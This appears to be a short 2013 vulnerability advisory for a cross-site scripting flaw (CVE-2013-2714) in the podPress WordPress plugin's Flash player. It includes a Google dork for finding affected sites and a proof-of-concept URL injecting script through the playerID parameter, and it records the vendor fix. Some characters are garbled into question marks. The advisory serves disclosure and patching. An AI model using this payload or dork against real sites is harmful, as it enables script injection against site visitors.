# Exploit Title: WordPress podPress Plugin XSS in SWF # Release Date: 28/03/13 # Author: hip [Insight-Labs] # Contact: hip@xxxxxxxxxxxxxxxx | Website: http://insight-labs.org # Software Link: http://downloads.wordpress.org/plugin/podpress.8.8.10.17.zip # Tested on: XPsp3 # Affected version: 8.8.10.13 before # Google Dork: inurl:/wp-content/plugins/podpress/ # REF:CVE-2013-2714 ???????????????????????????????????????? # Introduction: podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast. ????????????????????????????????????????- # XSS ? Proof Of Concept: vulnerable path: /wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf vulnerabile parameter:playerID POC: /wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// ????????????????????????????????????????- ???? Patch: ???? ? Vendor was notified on the 25/02/2013 ? Vendor released version 8.8.10.17 on 19/03/2013 Fixed the bug ????????????????????????????????????????-
